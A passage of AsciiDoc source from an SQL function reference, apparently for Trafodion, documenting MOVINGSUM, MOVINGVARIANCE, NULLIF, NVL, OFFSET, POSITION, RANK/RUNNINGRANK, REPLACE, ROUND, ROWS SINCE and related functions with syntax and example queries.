by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGSUM returns the same result as\r\nRUNNINGSUM:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingsum]]\r\n=== Examples of MOVINGSUM\r\n\r\n* Return the sum of non-null values of a column in the current window of\r\nthree rows:\r\n+\r\n```\r\nSELECT MOVINGSUM (I1,3) AS MOVINGSUM3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGSUM3\r\n------------\r\n 6215\r\n 34389\r\n 34389\r\n 32771\r\n 16563\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[movingvariance_function]]\r\n== MOVINGVARIANCE Function\r\n\r\nThe MOVINGVARIANCE function is a sequence function that returns the\r\nvariance of non-null values of a column in the current window of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nMOVINGVARIANCE is a {project-name} SQL extension.\r\n\r\n```\r\nMOVINGVARIANCE (column-expression, integer-expression [, max-rows])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_integer-expression_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the current window. The current window is defined\r\nas the current row and the previous (_integer-expression_ - 1) rows.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows in the current window.\r\n\r\nNote these considerations for the window size:\r\n\r\n* The actual value for the window size is the minimum of\r\n_integer-expression_ and _max-rows_.\r\n* If these conditions are met, MOVINGVARIANCE returns the same result as\r\nRUNNINGVARIANCE:\r\n** The _integer-expression_ is out of range, and _max-rows_ is not\r\nspecified. This condition includes the case in which both\r\n_integer-expression_ and _max-rows_ are larger than the result table.\r\n** The minimum of _integer-expression_ and _max-rows_ is out of range.\r\nIn this case, _integer-expression_ could be within range, but _max-rows_\r\nmight be the minimum value of the two and be out of range (for example,\r\na negative number).\r\n* The number of rows is out of range if it is larger than the size of\r\nthe result table, negative, or NULL.\r\n\r\n<<<\r\n[[examples_of_movingvariance]]\r\n=== Examples of MOVINGVARIANCE\r\n\r\n* Return the variance of non-null values of a column in the current window\r\nof three rows:\r\n+\r\n```\r\nSELECT MOVINGVARIANCE (I1,3) AS MOVINGVARIANCE3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nMOVINGVARIANCE3\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 2.41098840499999960E+008\r\n 2.19099696999999968E+008\r\n 2.28463602333333304E+008\r\n 3.64366210000000016E+007\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* You can use the CAST function for display purposes. For example:\r\n+\r\n```\r\nSELECT CAST(MOVINGVARIANCE (I1,3) AS DEC (18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 241098840.500\r\n 219099697.000\r\n 228463602.333\r\n 36436621.000\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[nullif_function]]\r\n=== NULLIF Function\r\n\r\nThe NULLIF function compares the value of two expressions. Both\r\nexpressions must be of comparable types. The return value is NULL when\r\nthe two expressions are equal. Otherwise, the return value\r\nis the value of the first expression.\r\n\r\n```\r\nNULLIF(expr1, expr2)\r\n```\r\n* `_expr1_`\r\n+\r\nan expression to be compared.\r\n\r\n* `_expr2_`\r\n+\r\nan expression to be compared.\r\n\r\nThe NULLIF(_expr1_, _expr2_) is equivalent to:\r\n\r\n```\r\nCASE\r\n WHEN expr1 = expr2 THEN NULL\r\n ELSE expr1\r\nEND\r\n```\r\n\r\nNULLIF returns a NULL if both arguments are equal. The return value is\r\nthe value of the first argument when the two expressions are not equal.\r\n\r\n[[examples_of_nullif]]\r\n=== Examples of NULLIF\r\n\r\n* This function returns a null if the _value_ is equal to 7. The return\r\nvalue is the value of the first argument when that value is not 7.\r\n+\r\n```\r\nNULLIF(value,7)\r\n```\r\n\r\n<<<\r\n[[nullifzero_function]]\r\n== NULLIFZERO Function\r\n\r\nThe NULLIFZERO function returns the value of the expression if that\r\nvalue is not zero. It returns NULL if the value of the expression is\r\nzero.\r\n\r\n```\r\nNULLIFZERO (expression)\r\n```\r\n\r\n* `_expression_`\r\n+\r\nspecifies a value expression. It must be a numeric data type.\r\n\r\n<<<\r\n[[examples_of_nullifzero]]\r\n=== Examples of NULLIFZERO\r\n\r\n* This function returns the value of the column named salary for each\r\nrow where the column's value is not zero. It returns a NULL for each row\r\nwhere the column's value is zero.\r\n+\r\n```\r\nSELECT NULLIFZERO(salary) FROM employee_tab;\r\n```\r\n\r\n* This function returns a value of 1 for each row of the table:\r\n+\r\n```\r\nSELECT NULLIFZERO(1) FROM employee_tab;\r\n```\r\n\r\n* This function returns a value of NULL for each row of the table:\r\n+\r\n```\r\nSELECT NULLIFZERO(0) FROM employee_tab;\r\n```\r\n\r\n<<<\r\n[[nvl_function]]\r\n== NVL Function\r\n\r\nThe NVL function determines if the selected column has a null value and\r\nthen returns the new-operand value; otherwise the operand value is\r\nreturned.\r\n\r\n```\r\nNVL (operand, new-operand)\r\n```\r\n\r\n* `_operand_`\r\n+\r\nspecifies a value expression.\r\n\r\n* `_new-operand_`\r\n+\r\nspecifies a value expression. _operand_ and _new-operand_ must be\r\ncomparable data types.\r\n\r\nIf _operand_ is a null value, NVL returns _new-operand_. If _operand_\r\nis not a null value, NVL returns _operand_.\r\n\r\nThe _operand_ and _new-operand_ can be a column name, subquery,\r\n{project-name} SQL string functions, math functions, or constant values.\r\n\r\n[[examples_of_nvl]]\r\n=== Examples of NVL\r\n\r\n* This function returns a value of z:\r\n+\r\n```\r\nSELECT NVL(CAST(NULL AS CHAR(1)), 'z') FROM (VALUES(1)) x(a);\r\n\r\n(EXPR)\r\n------\r\n\"z\"\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* This function returns a value of 1:\r\n+\r\n```\r\nSELECT NVL(1, 2) FROM (VALUES(0)) x(a)\r\n\r\n(EXPR)\r\n-------\r\n 1\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* This function returns a value of 9999999 for the null value in the\r\ncolumn named a1:\r\n+\r\n```\r\nSELECT NVL(a1, 9999999) from t1;\r\n\r\n(EXPR)\r\n-------\r\n 123\r\n 34\r\n9999999\r\n\r\n--- 3 row(s) selected.\r\n\r\nselect * from t1;\r\n\r\nA1\r\n-------\r\n 123\r\n 34\r\n ?\r\n\r\n--- 3 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[octet_length_function]]\r\n== OCTET_LENGTH Function\r\n\r\nThe OCTET_LENGTH function returns the length of a character string in\r\nbytes.\r\n\r\n```\r\nOCTET_LENGTH (string-value-expression)\r\n```\r\n\r\n* `_string-value-expression_`\r\n+\r\nspecifies the string value expression for which to return the length in\r\nbytes. {project-name} SQL returns the result as a 2-byte signed integer with\r\na scale of zero. If _string-value-expression_ is null, {project-name} SQL returns\r\na length of zero.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_octet_length]]\r\n=== Considerations for OCTET_LENGTH\r\n\r\n[[char_and_varchar_operands_1]]\r\n==== CHAR and VARCHAR Operands\r\n\r\nFor a column declared as fixed CHAR, {project-name} SQL returns the length of\r\nthat column as the maximum number of storage bytes. For a VARCHAR\r\ncolumn, {project-name} SQL returns the length of the string stored in that\r\ncolumn as the actual number of storage bytes.\r\n\r\n[[similarity_to_char_length_function]]\r\n==== Similarity to CHAR_LENGTH Function\r\n\r\nThe OCTET_LENGTH and CHAR_LENGTH functions are similar. The OCTET_LENGTH\r\nfunction returns the number of bytes, rather than the number of\r\ncharacters, in the string. This distinction is important for multi-byte\r\nimplementations. For an example of selecting a double-byte column, see\r\n<<examples_of_octet_length,Example of OCTET_LENGTH>>.\r\n\r\n[[examples_of_octet_length]]\r\n==== Examples of OCTET_LENGTH\r\n\r\n* If a character string is stored as two bytes for each character, this\r\nfunction returns the value 12. Otherwise, the function returns 6:\r\n+\r\n```\r\nOCTET_LENGTH ('Robert')\r\n```\r\n\r\n<<<\r\n[[offset_function]]\r\n=== OFFSET Function\r\n\r\nThe OFFSET function is a sequence function that retrieves columns from\r\nprevious rows of an intermediate result table ordered by a SEQUENCE BY\r\nclause in a SELECT statement. See <<sequence_by\r\nclause>>._offset_is_a_trafodion_sql_extension.\r\n\r\n```\r\nOFFSET ( column-expression , number-rows [, max-rows ])\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n\r\n* `_number-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the offset as the number of rows from the current\r\nrow. If the number of rows exceeds _max-rows_, OFFSET returns\r\nOFFSET(_column-expression_,_max-rows_). If the number of rows is out\r\nof range and _max-rows_ is not specified or is out of range, OFFSET\r\nreturns null. The number of rows is out of range if it is larger than\r\nthe size of the result table, negative, or NULL.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows of the offset.\r\n\r\n[[examples_of_offset]]\r\n=== Examples of OFFSET\r\n\r\n* Retrieve the I1 column offset by three rows:\r\n+\r\n```\r\nSELECT OFFSET(I1,3) AS offset3\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\noffset3\r\n------------\r\n ?\r\n ?\r\n ?\r\n 6215\r\n 28174\r\n\r\n--- 5 row(s) selected.\r\n```\r\n+\r\nThe first three rows retrieved display null because the offset from the\r\ncurrent row does not fall within the result table.\r\n\r\n<<<\r\n[[pi_function]]\r\n== PI Function\r\n\r\nThe PI function returns the constant value of pi as a floating-point\r\nvalue.\r\n\r\nPI is a {project-name} SQL extension.\r\n\r\n```\r\nPI()\r\n```\r\n\r\n[[examples_of_pi]]\r\n=== Examples of PI\r\n\r\n* This constant function returns the value 3.14159260000000000E+000:\r\n+\r\n```\r\nPI()\r\n```\r\n\r\n<<<\r\n[[position_function]]\r\n== POSITION Function\r\n\r\nThe POSITION function searches for a given substring in a character\r\nstring. If the substring is found, {project-name} SQL returns the character\r\nposition of the substring within the string. Every character, including\r\nmulti-byte characters, is treated as one character. The result returned\r\nby the POSITION function is equal to the result returned by the\r\n<<locate_function,LOCATE Function>>.\r\n\r\n```\r\nPOSITION (substring-expression IN source-expression)\r\n```\r\n\r\n* `_substring-expression_`\r\n+\r\nis an SQL character value expression that specifies the substring to\r\nsearch for in _source-expression_. The _substring-expression_ cannot be NULL.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_source-expression_`\r\n+\r\nis an SQL character value expression that specifies the source string.\r\nthe _source-expression_ cannot be null.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n{project-name} SQL returns the result as a 2-byte signed integer with a scale\r\nof zero. If _substring-expression_ is not found in _source-expression_,\r\n{project-name} SQL returns zero.\r\n\r\n[[considerations_for_position]]\r\n=== Considerations for POSITION\r\n\r\n[[result_of_position]]\r\n==== Result of POSITION\r\n\r\nIf the length of _source-expression_ is zero and the length of\r\n_substring-expression_ is greater than zero, {project-name} SQL returns 0. If\r\nthe length of _substring-expression_ is zero, {project-name} SQL returns 1.\r\n\r\nIf the length of _substring-expression_ is greater than the length of\r\n_source-expression_, {project-name} SQL returns zero. If\r\n_source-expression_ is a null value, {project-name} SQL returns a null value.\r\n\r\n[[using_the_upshift_function]]\r\n==== Using the UPSHIFT Function\r\n\r\nTo ignore case in the search, use the UPSHIFT function (or the LOWER\r\nfunction) for both the _substring-expression_ and the _source-expression_.\r\n\r\n[[examples_of_position]]\r\n=== Examples of POSITION\r\n\r\n* This function returns the value 8 for the position of the substring\r\n'John' within the string:\r\n+\r\n```\r\nPOSITION ('John' IN 'Robert John Smith')\r\n```\r\n\r\n* Suppose that the EMPLOYEE table has an EMPNAME column that contains\r\nboth the first and last names. Return all records in table EMPLOYEE that\r\ncontain the substring 'Smith' regardless of whether the column value is\r\nin uppercase or lowercase characters:\r\n+\r\n```\r\nSELECT * FROM persnl.employee\r\nWHERE POSITION ('SMITH' IN UPSHIFT(empname)) > 0 ;\r\n```\r\n\r\n<<<\r\n[[power_function]]\r\n== POWER Function\r\n\r\nThe POWER function returns the value of a numeric value expression\r\nraised to the power of an integer value expression. You can also use the\r\nexponential operator \\*\\*.\r\n\r\nPOWER is a {project-name} SQL extension.\r\n\r\n```\r\nPOWER (numeric-expression-1, numeric-expression-2)\r\n```\r\n\r\n* `_numeric-expression-1_, _numeric-expression-2_`\r\n+\r\nare SQL numeric value expressions that specify the values for the base\r\nand exponent arguments of the POWER function. See\r\n<<numeric_value_expressions>>.\r\n+\r\nIf base _numeric-expression-1 _is_zero, the exponent _numeric-expression-2_\r\nmust be greater than zero, and the result is zero. If the exponent is zero,\r\nthe base cannot be 0, and the result is 1. If the base is negative, the\r\nexponent must be a value with an exact numeric data type and a scale of zero.\r\n\r\n[[examples_of_power]]\r\n=== Examples of POWER\r\n\r\n* Return the value 15.625:\r\n+\r\n```\r\nPOWER (2.5,3)\r\n```\r\n\r\n* Return the value 27. The function POWER raised to the power of 2 is\r\nthe inverse of the function SQRT:\r\n+\r\n```\r\nPOWER (SQRT(27),2)\r\n```\r\n\r\n<<<\r\n[[quarter_function]]\r\n== QUARTER Function\r\n\r\nThe QUARTER function converts a DATE or TIMESTAMP expression into an\r\nINTEGER value in the range 1 through 4 that represents the corresponding\r\nquarter of the year. Quarter 1 represents January 1 through March 31,\r\nand so on.\r\n\r\nQUARTER is a {project-name} SQL extension.\r\n\r\n```\r\nQUARTER (datetime-expression)\r\n```\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type DATE or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_quarter]]\r\n=== Examples of QUARTER\r\n\r\n* Return an integer that represents the quarter of the year from the\r\nSTART_DATE column in the PROJECT table:\r\n+\r\n```\r\nSELECT start_date, ship_timestamp, QUARTER(start_date)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- ------\r\n2008-04-10 2008-04-21 08:15:00.000000 2\r\n```\r\n\r\n<<<\r\n[[radians_function]]\r\n== RADIANS Function\r\n\r\nThe RADIANS function converts a numeric value expression (expressed in\r\ndegrees) to the number of radians.\r\n\r\nRADIANS is a {project-name} SQL extension.\r\n\r\n```\r\nRADIANS (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the RADIANS function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_radians]]\r\n=== Examples of RADIANS\r\n\r\n* Return the value 7.85398150000000000E-001, or approximately 0.78540 in degrees:\r\n+\r\n```\r\nRADIANS (45)\r\n```\r\n\r\n* Return the value 45 in degrees. The function DEGREES is the inverse of\r\nthe function RADIANS.\r\n+\r\n```\r\nDEGREES (RADIANS (45))\r\n```\r\n\r\n<<<\r\n[[runningrank_function]]\r\n== RANK\/RUNNINGRANK Function\r\n\r\nThe RANK\/RUNNINGRANK function is a sequence function that returns the\r\nrank of the given value of an intermediate result table ordered by a\r\nSEQUENCE BY clause in a SELECT statement. RANK is an alternative syntax\r\nfor RANK\/RUNNINGRANK.\r\n\r\nRANK\/RUNNINGRANK is a {project-name} extension.\r\n\r\n```\r\nRUNNINGRANK(expression) | RANK(expression)\r\n```\r\n\r\n* _expression_\r\n+\r\nspecifies the expression on which to perform the rank.\r\n\r\nRANK\/RUNNINGRANK returns the rank of the expression within the\r\nintermediate result table. The definition of rank is as follows:\r\n\r\n```\r\nRANK = 1 for the first value of the intermediate result table.\r\n\r\n= the previous value of RANK if the previous value of expression is\r\nthe same as the current value of expression.\r\n\r\n= RUNNINGCOUNT(*) otherwise.\r\n```\r\n\r\nIn other words, RANK starts at 1. Values that are equal have the same\r\nrank. The value of RANK advances to the relative position of the row in\r\nthe intermediate result when the value changes.\r\n\r\n[[considerations_for_runningrank]]\r\n=== Considerations for RANK\/RUNNINGRANK\r\n\r\n[[sequence_order_dependency]]\r\n==== Sequence Order Dependency\r\n\r\nThe RUNNINGRANK function is meaningful only when the given expression is\r\nthe leading column of the SEQUENCE BY clause. This is because the\r\nRUNNINGRANK function assumes that the values of expression are in order\r\nand that like values are contiguous. If an ascending order is specified\r\nfor expression in the SEQUENCE BY clause, then the RUNNINGRANK function\r\nassigns a rank of 1 to the lowest value of expression. If a descending\r\norder is specified for expression in the SEQUENCE BY clause, then the\r\nRUNNINGRANK function assigns a rank of 1 to the highest value of\r\nexpression.\r\n\r\n[[runningrank_null_values]]\r\n==== NULL Values\r\n\r\nFor the purposes of RUNNINGRANK, NULL values are considered to be equal.\r\n\r\n[[examples_of_runningrank]]\r\n=== Examples of RANK\/RUNNINGRANK\r\n\r\n* Suppose that _seqfcn_ has been created as:\r\n+\r\n```\r\nCREATE TABLE cat.sch.seqfcn (i1 INTEGER, i2 INTEGER);\r\n```\r\n+\r\nThe table SEQFCN has columns _i1_ and _i2_ with data:\r\n+\r\n[cols=\"15%,85%\",options=\"header\"]\r\n|===\r\n| i1 | i2\r\n| 1 | 100\r\n| 3 | 200\r\n| 4 | 100\r\n| 2 | 200\r\n| 5 | 300\r\n| 10 | null\r\n|===\r\n\r\n* Return the rank of _i1_:\r\n+\r\n```\r\nSELECT i1, RUNNINGRANK(i1) AS rank\r\nFROM cat.sch.seqfcn SEQUENCE BY i1;\r\n\r\ni1 rank\r\n----------- --------------------\r\n 1 1\r\n 2 2\r\n 3 3\r\n 4 4\r\n 5 5\r\n 6 6\r\n 8 7\r\n 10 8\r\n\r\n--- 8 row(s) selected.\r\n```\r\n\r\n<<<\r\n* Return the rank of _i1_ descending:\r\n+\r\n```\r\nSELECT i1, RUNNINGRANK (i1) AS rank\r\nFROM cat.sch.seqfcn SEQUENCE BY i1 DESC;\r\n\r\ni1 rank\r\n----------- --------------------\r\n 10 1\r\n 8 2\r\n 6 3\r\n 5 4\r\n 4 5\r\n 3 6\r\n 2 7\r\n 1 8\r\n\r\n--- 8 row(s) selected.\r\n```\r\n\r\n* Return the rank of _i2_, using the alternative RANK syntax:\r\n+\r\n```\r\nSELECT i2, RANK (i2) AS rank\r\nFROM cat.sch.seqfcn SEQUENCE BY i2;\r\n\r\ni2 rank\r\n----------- --------------------\r\n 100 1\r\n 100 1\r\n 200 3\r\n 200 3\r\n 200 3\r\n 300 6\r\n ? 7\r\n ? 7\r\n\r\n--- 8 row(s) selected.\r\n```\r\n+\r\nNotice that the two NULL values received the same rank.\r\n\r\n<<<\r\n* Return the rank of _i2_ descending, using the alternative RANK syntax:\r\n+\r\n```\r\nSELECT i2, RANK (i2) AS rank\r\nFROM cat.sch.seqfcn SEQUENCE BY i2 DESC;\r\n\r\ni2 rank\r\n----------- --------------------\r\n ? 1\r\n ? 1\r\n 300 3\r\n 200 4\r\n 200 4\r\n 200 4\r\n 100 7\r\n 100 7\r\n\r\n--- 8 row(s) selected.\r\n```\r\n\r\n* Return the rank of _i2_ descending, excluding NULL values:\r\n+\r\n```\r\nSELECT i2, RANK (i2) AS rank\r\nFROM cat.sch.seqfcn WHERE i2 IS NOT NULL SEQUENCE BY i2 DESC;\r\n\r\ni2 rank\r\n----------- --------------------\r\n 300 1\r\n 200 2\r\n 200 2\r\n 200 2\r\n 100 5\r\n 100 5\r\n\r\n--- 6 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[repeat_function]]\r\n== REPEAT Function\r\n\r\nThe REPEAT function returns a character string composed of the\r\nevaluation of a character expression repeated a specified number of\r\ntimes.\r\n\r\nREPEAT is a {project-name} SQL extension.\r\n\r\n```\r\nREPEAT (character-expr, count)\r\n```\r\n\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to return the specified number of\r\nrepeated strings. The source string is an SQL character value expression.\r\nThe operand is the result of evaluating _character-expr_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_count_`\r\n\r\nspecifies the number of times the source string _character-expr_ is to\r\nbe repeated. The number count must be a value greater than or equal\r\nto zero of exact numeric data type and with a scale of zero.\r\n\r\n[[examples_of_repeat]]\r\n=== Examples of REPEAT\r\n\r\n* Return this quote from Act 5, Scene 3, of King Lear:\r\n+\r\n```\r\nREPEAT ('Never,', 5)\r\n\r\nNever,Never,Never,Never,Never,\r\n```\r\n\r\n<<<\r\n[[replace_function]]\r\n== REPLACE Function\r\n\r\nThe REPLACE function returns a character string where all occurrences of\r\na specified character string in the original string are replaced with\r\nanother character string. All three character value expressions must be\r\ncomparable types. The return value is the VARCHAR type.\r\n\r\nREPLACE is a {project-name} SQL extension.\r\n\r\n```\r\nREPLACE (char-expr-1, char-expr-2, char-expr-3)\r\n```\r\n\r\n* `_char-expr-1_, _char-expr-2_, _char-expr-3_`\r\n+\r\nare SQL character value expressions. The operands are the result of\r\nevaluating the character expressions. All occurrences of _char-expr-2_\r\nin _char-expr-1_ are replaced by _char-expr-3_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[examples_of_replace]]\r\n=== Examples of REPLACE\r\n\r\n* Use the REPLACE function to change job descriptions so that occurrences\r\nof the company name are updated:\r\n+\r\n```\r\nSELECT jobdesc FROM persnl.job;\r\n\r\njob_description\r\n------------------\r\nMANAGER COMNET\r\nPRODUCTION COMNET\r\nASSEMBLER COMNET\r\nSALESREP COMNET\r\nSYSTEM ANAL COMNET\r\n...\r\n\r\n--- 10 row(s) selected.\r\n\r\nUPDATE persnl.job\r\nSET jobdesc = REPLACE(jobdesc, 'COMNET', 'TDMNET');\r\n\r\nJob Description\r\n------------------\r\nMANAGER TDMNET\r\nPRODUCTION TDMNET\r\nASSEMBLER TDMNET\r\nSALESREP TDMNET\r\nSYSTEM ANAL TDMNET\r\n...\r\n\r\n--- 10 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[right_function]]\r\n== RIGHT Function\r\n\r\nThe RIGHT function returns the rightmost specified number of characters\r\nfrom a character expression. Every character, including multi-byte\r\ncharacters, is treated as one character.\r\n\r\nRIGHT is a {project-name} SQL extension.\r\n\r\n```\r\nRIGHT (character-expr, count)\r\n```\r\n\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to return the rightmost specified\r\nnumber of characters. The source string is an SQL character value expression.\r\nThe operand is the result of evaluating _character-expr_.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_count_`\r\n+\r\nspecifies the number of characters to return from _character-expr_.\r\nThe number count must be a value of exact numeric data type with a scale\r\nof zero.\r\n\r\n[[examples_of_right]]\r\n=== Examples of RIGHT\r\n\r\n* Return 'smith':\r\n+\r\n```\r\nRIGHT('robert_john_smith', 5)\r\n```\r\n\r\n* Suppose that a six-character company literal has been concatenated as\r\nthe first six characters to the job descriptions in the JOB table. Use\r\nthe RIGHT function to remove the company literal from the job\r\ndescriptions:\r\n+\r\n```\r\nUPDATE persnl.job\r\nSET jobdesc = RIGHT (jobdesc, 12);\r\n```\r\n\r\n<<<\r\n[[round_function]]\r\n== ROUND Function\r\n\r\nThe ROUND function returns the value of _numeric_expr_ rounded to _num_\r\nplaces to the right of the decimal point.\r\n\r\nROUND is a {project-name} SQL extension.\r\n\r\n```\r\nROUND(numeric-expr [ , num ] )\r\n```\r\n\r\n* `_numeric-expr_`\r\n+\r\nis an SQL numeric value expression.\r\n\r\n* `_num_`\r\n+\r\nspecifies the number of places to the right of the decimal point for\r\nrounding. If _num_ is a negative number, all places to the right of the\r\ndecimal point and _num_ places to the left of the decimal point are\r\nzeroed. If _num_ is not specified or is 0, then all places to the right\r\nof the decimal point are zeroed.\r\n+\r\nFor any exact numeric value, the value _numeric_expr_ is rounded away\r\nfrom 0 (for example, to x+1 when x.5 is positive and to x-1 when x.5 is\r\nnegative). For the inexact numeric values (real, float, and double) the\r\nvalue _numeric_expr_ is rounded toward the nearest even number.\r\n\r\n<<<\r\n[[examples_of_round]]\r\n=== Examples of ROUND\r\n\r\n* This function returns the value of 123.46.\r\n+\r\n```\r\nROUND(123.4567,2)\r\n```\r\n\r\n* This function returns the value of 123.\r\n+\r\n```\r\nROUND(123.4567,0)\r\n```\r\n\r\n* This function returns the value of 120.\r\n+\r\n```\r\nROUND(123.4567,-1)\r\n```\r\n\r\n* This function returns the value of 0.\r\n+\r\n```\r\nROUND(999.0,-4)\r\n```\r\n\r\n* This function returns the value of 1000.\r\n+\r\n```\r\nROUND(999.0.-3)\r\n```\r\n\r\n* This function returns the value of 2.0E+000.\r\n+\r\n```\r\nROUND(1.5E+000,0)\r\n```\r\n\r\n* This function returns the value of 2.0E+00.\r\n+\r\n```\r\nROUND(2.5E+000,0)\r\n```\r\n\r\n* This function returns the value of 1.0E+00.\r\n+\r\n```\r\nROUND(1.4E+000,0)\r\n```\r\n\r\n<<<\r\n[[rows_since_function]]\r\n== ROWS SINCE Function\r\n\r\nThe ROWS SINCE function is a sequence function that returns the number\r\nof rows counted since the specified condition was last true in the\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRows since is a {project-name} SQL extension.\r\n\r\n```\r\nROWS_SINCE [INCLUSIVE] (condition [, max-rows])\r\n```\r\n\r\n* `INCLUSIVE`\r\n+\r\nspecifies the current row is to be considered. If you specify INCLUSIVE,\r\nthe condition is evaluated in the current row. Otherwise, the condition\r\nis evaluated beginning with the previous row. If you specify INCLUSIVE\r\nand the condition is true in the current row, ROWS SINCE returns 0.\r\n\r\n* `_condition_`\r\n+\r\nspecifies a condition to be considered for each row in the result table.\r\nEach column in _condition_ must be a column that exists in the result\r\ntable. If the condition has never been true for the result table, ROWS\r\nSINCE returns null.\r\n\r\n* `_max-rows_`\r\n+\r\nis an SQL numeric value expression of signed data type SMALLINT or\r\nINTEGER that specifies the maximum number of rows from the current row\r\nto consider. If the condition has never been true for _max-rows_ from\r\nthe current row, or if _max-rows_ is negative or null, ROWS SINCE\r\nreturns null.\r\n\r\n[[considerations_for_rows_since]]\r\n=== Considerations for ROWS SINCE\r\n\r\n[[counting_the_rows]]\r\n==== Counting the Rows\r\n\r\nIf you specify INCLUSIVE, the condition in each row of the result table\r\nis evaluated starting with the current row as row 0 (zero) (up to the\r\nmaximum number of rows or the size of the result table). Otherwise, the\r\ncondition is evaluated starting with the previous row as row 1.\r\n\r\nIf a row is reached where the condition is true, ROWS SINCE returns the\r\nnumber of rows counted so far. Otherwise, if the condition is never true\r\nwithin the result table being considered, ROWS SINCE returns null.\r\n{project-name} SQL then goes to the next row as the new current row.\r\n\r\n[[examples_of_rows_since]]\r\n=== Examples of ROWS SINCE\r\n\r\n* Return the number of rows since the condition\t_i1 IS NULL_ became true:\r\n+\r\n```\r\nSELECT ROWS SINCE (i1 IS NULL) AS rows_since_null\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nrows_since_null\r\n---------------\r\n ?\r\n ?\r\n 1\r\n 2\r\n 1\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* Return the number of rows since the condition _i1 < i2_ became true:\r\n+\r\n```\r\nSELECT ROWS SINCE (i1<i2), ROWS SINCE INCLUSIVE (i1<i2)\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR) (EXPR)\r\n--------------- ---------------\r\n ? 0\r\n 1 1\r\n 2 0\r\n 1 1\r\n 2 0\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[rows_since_changed_function]]\r\n== ROWS SINCE CHANGED Function\r\n\r\nThe ROWS SINCE CHANGED function is a sequence function that returns the\r\nnumber of rows counted since the specified set of values last changed in\r\nthe intermediate result table ordered by a SEQUENCE BY clause in a\r\nSELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nROWS SINCE CHANGED is a {project-name} SQL extension.\r\n\r\n```\r\nROWS SINCE CHANGED (column-expression-list)\r\n```\r\n\r\n* `_column-expression-list_`\r\n+\r\nis a comma-separated list that specifies a derived column list\r\ndetermined by the evaluation of the column expression list.\r\nROWS SINCE CHANGED returns the number of rows counted since the\r\nvalues of _column-expression-list_ changed.\r\n\r\n[[considerations_for_rows_since_changed]]\r\n=== Considerations for ROWS SINCE CHANGED\r\n\r\n[[counting_the_rows]]\r\n==== Counting the Rows\r\n\r\nFor the first row in the intermediate result table, the count is 1. For\r\nsubsequent rows that have the same value for _column-expression-list_ as\r\nthe previous row, the count is 1 plus the count\r\nin the previous row. For subsequent rows that have a different value of\r\n_column-expression-list_\r\nthan the previous row, the count is 1.\r\n\r\n[[examples_of_rows_since_changed]]\r\n=== Examples of 